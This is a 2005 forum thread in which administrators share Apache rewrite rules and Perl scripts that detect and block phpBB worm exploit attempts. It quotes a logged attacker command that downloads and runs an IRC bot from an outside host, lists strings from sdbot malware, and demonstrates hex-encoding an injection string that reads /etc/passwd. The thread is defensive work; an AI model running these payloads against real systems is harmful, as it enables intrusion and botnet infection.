Page 2 of 3

Posted: Sat Jan 01, 2005 5:24 pm
by Void Main
I just wrote a script that will automatically block IP addresses (via iptables) that are running the phpBB worm or people trying to exploit my site via the same vulnerability. Even though I am patched I don't want them poking around. There are two parts to this. The Perl CGI script and the rewrite rules. Here are the rules for the /etc/httpd/conf/httpd.conf:

Code: Select all

       # block IP addresses of PHP/phpBB vulnerability attempts
       RewriteCond %{REQUEST_URI} ^(.*)\&rush=(.*) [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
       RewriteCond %{QUERY_STRING} ^(.*)\&rush=(.*) [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
       RewriteCond %{QUERY_STRING} ^(.*)echr\((.*)  [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
       RewriteCond %{QUERY_STRING} ^(.*)wget%20(.*) [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
       RewriteCond %{QUERY_STRING} ^(.*)perl%20(.*) [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
       RewriteCond %{QUERY_STRING} ^(.*)system\((.*) [NC]
       RewriteRule ^.*$ /z/blk_php_worm.cgi
The /z/blk_php_worm.cgi script (modify to fit your environment):

Code: Select all

#!/usr/bin/perl

# by Void Main
# block sites with PHP worm

use Socket;

# These files have to exist and writable by apache user
$log    = "/public/php_worm.log";
$blklog = "/public/php_worm_blocked.log";

$iaddr = inet_aton("$ENV{REMOTE_ADDR}");
$name  = gethostbyaddr($iaddr, AF_INET);
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year+=1900; $mon+=1;

open(OF,">>$log");
printf(OF "%04d/%02d/%02d %02d:%02d:%02d - $ENV{REMOTE_ADDR} - $name\n", $year, $mon, $mday, $hour, $min, $sec);
close(OF);

# Only really block if Query String is greater than 50 chars
# Put any conditions you like here
if ( length($ENV{QUERY_STRING}) > 50 ) {
  $block = 1;
  $blkmsg = "If you feel you have been blocked in error please send your IP address to \"voidmain AT linuxmail.org\" and I will unblock you.";
} else {
  $blkmsg = "Actually, you weren\'t blocked this time but you are pushing your luck!";
}

print "Content-type: text/html\n\n";
print <<EndEND;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Your IP Address has been blocked!</title>
</head>
<body bgcolor=black text=white>
<h3><font color=red>Your IP Address has been blocked!</font></h3>
<font color=red>The following is a portion of the information that has been logged and sent to the FBI for further analysis:</font><br><br>
<font color=yellow>
 Your Address: $ENV{REMOTE_ADDR}<br>
Your Hostname: $name<br>
</font>
<br>
$blkmsg
</body>
</html>
EndEND

if ( $block ) {
  system("/usr/bin/sudo /sbin/block $ENV{REMOTE_ADDR} >> $blklog 2>&1");
} else {
  open(OF,">>$blklog");
  printf(OF "%04d/%02d/%02d %02d:%02d:%02d - $ENV{REMOTE_ADDR} - not infected\n",$year,$mon,$mday,$hour,$min,$sec);
  close(OF);
}
NOTES:
- You have to have my "block" script in your /sbin directory (should be in my files section).
- You have to have sudo configured to allow the apache user to execute the block script.
- The only check above the QUERY_STRING checks in the rewrite rules are to see if the QUERY_STRING is greater than 50 chars (so I can test without blocking myself). You could come up with better tests.
- I have my logs in /public, change this to whereever you want them to go and then make sure they exist and are writable by user "apache".

Posted: Sun Jan 02, 2005 8:55 am
by agent007
wow!! I really wish I could understand that and be able to write atleast something close to them...

Posted: Sun Jan 02, 2005 9:34 am
by Void Main
I just added another rewrite rule (&rush=) and made a few minor changes to the script, still ugly but works:
http://voidmain.is-a-geek.net/files/scr ... p_worm.txt

If you want to use it just rename it and set it executable and put it in a CGI capable directory on your server. You'll need to change the two log variables to point to whatever you want for the log file names, touch the log file names and chang ownership of them to your apache user. Whereever you put this script make sure it's path/name is reflected in your rewrite rules in your httpd.conf.

Now there are two other pieces that must be in place before someone will actually get blocked. You have to have to be running iptables and have my block script installed and you have to have sudo configured to allow the apache user to execute the block script. Here are my block and unblock scripts:

http://voidmain.is-a-geek.net/files/iptables/block
http://voidmain.is-a-geek.net/files/iptables/unblock

They might actually be a little Red Hat specific because of the "/sbin/service iptables save" line. This could be replaced with an "iptables-save" command (see "man iptables-save"). Also change the "dev" variable to the network interface that you want the rules applied to.

To configure sudo use the "visudo" command. Here is my config:
http://voidmain.is-a-geek.net/files/configs/sudoers

If you are interested in setting it up and get stuck somewhere I can try and help.

Posted: Sun Jan 09, 2005 4:17 pm
by Void Main
I updated the decode script to work a little better and edited my previous message to reflect the new code. It seems to work much better now. Your mileage may vary.

Here is the new php_decode_sploit.php:
http://voidmain.is-a-geek.net/files/scr ... it.php.txt

Here is the old one:
http://voidmain.is-a-geek.net/files/scr ... hp.old.txt

Posted: Mon Jan 10, 2005 9:16 pm
by Void Main
Heh heh, so I happen to look over my logs to see what commands people have been attempting to run through my phpBB hole that doesn't exist and I get this line:

echo _START_; cd /tmp;wget users.volja.net/kojpic/botek;wget users.volja.net/kojpic/botek;chmod 777 /tmp/botek;/tmp/botek;rm sess_189f0f0889555397a4de5485dd611111; echo _END_

So I download "users.volja.net/kojpic/botek" to see what it is and notice it's a binary executable which when run attempts to set my machine up as an IRC zombie. Looking through the binary shows it's a variant of this:

http://packetstorm.linuxsecurity.com/di ... d/DOSnet.c

So then I decide to check out the site that got owned where the binary resides:

http://users.volja.net/kojpic/

These are some creative kiddies. All you have to do to get shell access is download and run this IRC zombie windows binary and you'll get emailed your shell account login info within 24 hours (SURE you will). Better hurry! :)

So I download and look through the "check.exe" Windows binary and see some pretty funny stuff. I'm sure it sticks itself in the Run registry key by the looks of it. They even tell you "YOU CANT REMOVE MY BOT ! IDIOT !!!!". :)

Selected output from "strings check.exe":

Code: Select all

Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
main thread
mode $chan +o $user
opme
join $1
mjoin
part $1
mpart
server $1 $2
jump
msg $1 FL0000000000000000000000000000000000000000D
flood
quit PANIC PANIC PANIC !!!
panic
action $chan smacks $1
smack
udp $1 10000 2048 50
ping $1 10000 $2 50
raw PRIVMSG $1 :$chr(1)$2-$chr(1)
ctcp
bot started.
connected to %s.
hD @
%d, %d : USERID : UNIX : %s
BRh& @
WVS1
NICK %s
USER %s 0 0 :%s
PING
JOIN %s %s
USERHOST %s
KICK
screw you %s!
user %s logged out.
NOTICE %s :%s
NICK
PART
QUIT
PRIVMSG
NOTICE
VERSION
NOTICE %s :
VERSION %s
login
user %s(%s) logged in.
password accepted.
$user
$chan
$rndnick
$server
$chr(
rndnick
NICK %s
logout
user %s logged out.
reconnect
QUIT :reconnecting
disconnect
QUIT :later
quit
QUIT :%s
QUIT :later
status
sdbot 0.5b ready. Up %dd %dh %dm.
about
sdbot 0.5b by [sd] (sdbot@mail.ru). homepage: http://sdbot.n3.net/
threads
-[thread list]-
%d. %s
aliases
-[alias list]-
%d. %s = %s
netinfo
sysinfo
remove
YOU CANT REMOVE MY BOT ! IDIOT !!!!
nick
join
part
PART %s
killthread
thread(s) killed.
c_quit
c_rndnick
c_rn
NICK %s
prefix
open
file opened.
couldn't open file.
server
%s -> %s
couldn't resolve host
visit
addalias
privmsg
action
ACTION %s
cycle
mode
MODE %s
repeat
c_raw
c_mode
MODE %s
c_nick
c_join
JOIN %s %s
c_part
PART %s
%s %s %s :%s
delay
update
%s\%s.exe
update (%s)
downloading update from %s...
execute
couldn't execute file.
clone (%s)
clone created on %s:%d, in channel %s.
download (%s)
downloading %s...
redirect (%d->%s:%d)
redirect created on port %d to %s:%d.
c_privmsg
c_pm
[%s] <%s> %s
sending %d udp packets to: %s. packet size: %d, delay: %d[ms].
ping (%s)
sending %d pings to %s. packet size: %d, timeout: %d[ms]
icmp.dll not available
spy (%s)
spy created on %s:%d, in channel %s.
$%d-
joined channel %s.
JOIN
MODE
ACTION
ACTION
[%s]: * %s %s
[%s]: <%s> %s
[%s]: %s sets mode: %s
[%s]: %s is now known as %s.
[%s]: %s has quit(%s).
wth %s?
[%s]: %s has left %s.
[%s]: %s has joined %s.
[%s]: nick %s already in use.
[%s]: Users in %s: %s
Phna@
Rhua@
PRIVMSG %s :finished sending packets to %s.
PRIVMSG %s :error sending packets to %s.
Ph0c@
PRIVMSG %s :finished sending pings to %s.
PRIVMSG %s :error sending pings to %s.
file download (%s - %dkb transferred)
downloaded %.1f kb to %s @ %.1f kb/sec.
PRIVMSG %s :opened %s.
downloaded %.1f kb to %s @ %.1f kb/sec. updating...
update failed: error executing file.
update (%s - %dkb transferred)
PRIVMSG %s :couldn't open %s.
bad url, or dns error.
dial-up
connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s
cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm
%s [%s]
2000
hnq@
WVSPP
jdRP
invalid URL.
url visited.
error visiting URL.
PRVQ
h!t@
%s\r.bat
@echo off
:start
if not exist ""%1"" goto done
del /F ""%1""
del ""%1""
goto start
:done
del /F %temp%
.bat
del %temp%
%%comspec%% /c %s %s
jihpv@
bl4ckg0atek
#black
bots1.kralj.net
syscfg32.exe
Configuration Loader
sdbot v0.5b by [sd]

Posted: Tue Jan 11, 2005 12:06 am
by worker201
What do these monkeys want? Just to prove how badass they are? Since Void has stopeed their activity, they're clearly not all that badass, are they?

That run section of the Windows registry, any idea what that does? I've noticed that most trojans and viruses end up creating keys there, which you have to remove by hand after infection. You'd think that these kids would find some other place to put their crap. It's like they've never been to http://www.sarc.com

Posted: Tue Jan 11, 2005 6:51 am
by Void Main
worker201 wrote:That run section of the Windows registry, any idea what that does? I've noticed that most trojans and viruses end up creating keys there, which you have to remove by hand after infection. You'd think that these kids would find some other place to put their crap. It's like they've never been to http://www.sarc.com
They put it in the Run key because anything in the Run key gets started automatically when the system starts up (like putting it in the AUTOEXEC.BAT in the old days). It's one of the reasons Microsoft is such a piece of crap and I won't use it, no security. There is absolutely no way a user should be able to add something to the system registy without requiring some sort of extra authentication (a password, etc). It would be like a normal user in Linux being able to add something to the rc scripts. Of course most of the people that use Windows that I know would probably happily supply a password for such malware. Might be pointless now that I think about it.

Posted: Fri Jan 14, 2005 1:36 am
by ZiaTioN
LOL.. I love the sarcasrm!

Anyway Void you enspire me! So I wrote a little filter script to compliment the collection of tools you have written for this little epidemic. After reading how many sites are trying to hit you you may not want to run this simply for the possible system resource hogging. Anyway I wrote a filter to put in place of your viewtopic.php and monitor http requests passing valid and blocking non-valid. It also emails a selected email[s] information of the attempted attack. If you notice that your site seems to be lagged by 1700 attempts simply disable the mail function and save log in some other way.

Code: Select all

#!/usr/bin/perl -wT
                                                                                                                                                             
###################################################
#Program: sploit_filter.cgi
#Author: ZiaTioN
#Requires: See "use" statements for modules
#          Message Board running phpBB
#
# Description:
# This filter app can be used to filter
# harmfull requests that attempt to use
# the highlight exploit in phpBB. If detected
# the script will block access and email
# system administrator details about the
# malicious user. Information such as IP
# Address, Web Browser, Attempted shell code,
# etc. There is much more info that can be
# added if desired.
# To effectively install this filter you need
# to have all message board http requests
# traverse through this filter application.
# To accomplish this one possible way is to
# create a dummy viewtopic.php file and have it
# redirect to the sploit_filter.cgi script
# along with sending the entire query string (URL).
# Then rename your real viewtopic.php file something
# else and have the filter script redirect valid
# traffic to this newly renamed viewtopic.php.
#
# Ex:
#                                   Exploit Code Results:  --><error page>--><web browser>
# <web query>--><dummy viewtopic.php>--><sploit_filter.cgi>
#                                   Valid Traffic Results: --><renamed viewtopic.php>--><web browser>
##################################################
                                                                                                                                                             
                                                                                                                                                             
use strict;
use CGI qw(:standard);
use Mail::Sendmail;
                                                                                                                                                             
my $query = $ENV{QUERY_STRING};
my $link  = $ENV{REQUEST_URI};
                                                                                                                                                             
if (($query =~ /highlight/) && ($query =~ /system/) || ($query =~ /rush/)) {
   my $string = $1 if (($query =~ /system(.*)/) || ($query =~ /rush(.*)/));
   my ($decode, @chars, $dString);
                                                                                                                                                             
   if ($string && $string =~ /chr\(\d+?\)/) {
      $decode   = url_decode($string);
      @chars    = split(" ", $decode);
      $dString .= chr($_) for (@chars);
   }else{
      $dString = url_hex_decode($string);
   }
                                                                                                                                                             
   print "Content-type: text/html; charset=ISO-8859-1\n\n";
   print <<END;
   <html>
   <head><title>Exploit Attempt!</title>
                                                                                                                                                             
   <style type="text/css">
   <!--
   a:link, a:visited { text-decoration: none }
   a:hover { text-decoration: none }
   -->
   </style>
   </head>
   <body bgcolor="#000000" text="#808080" topmargin="0" leftmargin="0" bottommargin="0" rightmargin="0" marginwidth="0" marginheight="0">
    <center>
     <p><font color="red" size="+3">You Have Tried To Exploit This Server!</font></p>
     <p><font color="#FFFFFF" size="+1">Your Information Has Been Logged And Sent To The System Administrator!</font></p>
     <p><font color="#FFFFFF" size="+1">Decoded Command[s]: $dString</font></p>
    </center>
   </body>
   </html>
END
                                                                                                                                                             
   send_alert($dString);
}else{
   my $valid = "http:www.perlskripts.com".$link; # <-- change the quoted portion of this variable to your site.
   print redirect($valid);
}
                                                                                                                                                             
sub url_decode {
   my $theURL = shift;
   $theURL =~ s/%([a-fA-F0-9]+)//eg;
   $theURL =~ s/\(//g;
   $theURL =~ s/\)//g;
   $theURL =~ s/[^\d+]/ /g;
   return $theURL;
}
                                                                                                                                                             
sub url_hex_decode {
   my $theURL = shift;
   $theURL =~ s/\(//g;
   $theURL =~ s/\)//g;
   $theURL =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
   $theURL =~ s/[%\d]+//g;
   return $theURL;
}
                                                                                                                                                             
sub send_alert {
  my $command = shift;
  my %mail = ( To      => 'user@email.com, email@user.com', # <-- change this to how ever many valid emails you want to receive alerts.
               From    => 'root@localhost.com',
               Subject => "An Exploit Attempt Has Been Made!!",
               Message => "Malicious User Info\nAttackers Address: $ENV{REMOTE_ADDR}\nAttackers Browser: $ENV{HTTP_USER_AGENT}\nCommand[s] Sent: $command"
               );
                                                                                                                                                             
  sendmail (%mail) || die $Mail::Sendmail::error;
}
I do not have a message board period, let alone one running phpBB so I have not tested this against a phpBB board directly but I have tested in other ways and it seems to be very functional. I noticed that attackers have been sending attempts in all raw hex or a meddly of hex and unicode so I added decode functions for both.

Posted: Fri Jan 14, 2005 1:51 am
by ZiaTioN
Just for shits and giggles here is another small one I wrote to encode and decode hex to ascii and vise versa.

Code: Select all

#!/usr/bin/perl -w
 
use strict;
 
die "Error!\n" unless @ARGV;
my $opt = $ARGV[0];
my $cmd = $ARGV[1];
 
if ($opt eq "-encode") {
   $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
}elsif ($opt eq "-decode") {
   $cmd =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
}else{
   usage();
   exit(0);
}
print "Your encoded string is: $cmd\n";
 
sub usage{
   my @path = split(/\//, $0);
   @path = reverse(@path);
   print "Syntax error!\nUsage: $path[0] <-encode|-decode> <command[s] to parse>\n";
}
Run like:
[ziation@perlskripts.com]$ perl encdec.pl -encode "w;uname -a;ls -al;kill yomamma;cat /etc/passwd"
Your encoded string is: %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
[ziation@perlskripts.com]$ perl encdec.pl -decode %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
Your decoded string is: w;uname -a;ls -al;kill yomamma;cat /etc/passwd

Posted: Fri Jan 14, 2005 2:08 am
by Void Main
That's pretty good. It should work and it did give me an idea. Couple of thoughts on the subject, having the script send me a message for every exploit attempt would surely flood my mailbox, especially in the early days of this last phpBB worm. You probably would want it to go to a log instead as you mention (which I do when I lock out sites who hit me with exploit attempts). Of course when I first noticed the problem I only had a few manual attempts but when the worm hit it was thousands of exploited machines that were hitting me which I don't really need to know about but I do want to filter that traffic (again the firewall block script works well for this).

Now the idea part. Instead of sending a message to "me" on an exploit attempt it would be great if, in addition to the firewall block of the address that the exploit attempt originated from, a message could be sent to the webmaster of the exploited server. Problem is, most people don't put their email addresses anywhere on their web sites any more. It used to be you could go to a random page that doesn't exist and grab the email address off of it like on my site:

http://voidmain.is-a-geek.net/page_that ... exist.html

In this last worm someone actually was a little more creative and wrote a variant of the worm that went around and patched all the vulnerable systems. :) It's something I never would have done because that will land you in jail just as fast as the author of the original worm author.

A note on the redirect. I used the Apache redirect rules to redirect an exploit attempt to my block page. This should be quite a bit more efficient than calling a CGI program. Good job! I was hoping someone would come up with some other ideas. :)

Posted: Fri Jan 14, 2005 2:19 am
by Void Main
ZiaTioN wrote: Run like:
[ziation@perlskripts.com]$ perl encdec.pl -encode "w;uname -a;ls -al;kill yomamma;cat /etc/passwd"
Your encoded string is: %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
[ziation@perlskripts.com]$ perl encdec.pl -decode %77%3B%75%6E%61%6D%65%20%2D%61%3B%6C%73%20%2D%61%6C\
%3B%6B%69%6C%6C%20%79%6F%6D%61%6D%6D%61%3B%63%61%74\
%20%2F%65%74%63%2F%70%61%73%73%77%64
Your decoded string is: w;uname -a;ls -al;kill yomamma;cat /etc/passwd
I edited your message and broke the strings up as the lines were too long for the forum width. Sorry about that. Just curious, how will your script handle these log entries:

http://voidmain.is-a-geek.net/files/scr ... .input.log

I get this with my decoder:

http://voidmain.is-a-geek.net/files/scr ... output.log

Posted: Fri Jan 14, 2005 10:59 am
by ZiaTioN
I think I get the same thing.

Here is what I get off of the first string.
Here is what I get from the second entry in your example.

This style of attack code was the first syntax I coded this filter for but I added the pure hex decode also after I saw thisexploit script. Namely the way they construct their $cmd variable and $path variables. They use pure hex so I added the functionality to filter and block those attempts also.

Thisis the first example with the pure hex exploit attempt.
Thisis the second example with the pure hex exploit attempt instead of the mix of hex and unicode.

If you notice on these last two links if you hover your mouse over each link your broweser will decode the pure hex itself and show you the true link at the bottom (or at least Firefox does). I guess you would have to "view source" to actually see the hex strings I used.

Posted: Fri Jan 14, 2005 12:29 pm
by Void Main
Hey, I was just checking out your site. Very slick/clean look. I wish I had an ounce of that creativity! :)

Posted: Fri Jan 14, 2005 12:49 pm
by ZiaTioN
Ahh cool, thanks. I don't know if you would call it creativity but I appreciate the compliment :-).

By the way, I have implemented a way to extract the domain from the encoded exploit string and obtain an email (if it exists) to email the admin of the infected site but am having issues with using the secure open() call neccessary when using taint mode. I am still working on it here and there and hopefully will be up by this afternoon.

Posted: Fri Jan 14, 2005 1:32 pm
by Void Main
Are you talking about the address of the server that generated the hit or the address in the encoded string where the code is downloaded from? I was referring to the former. Both addresses are likely 0wned though.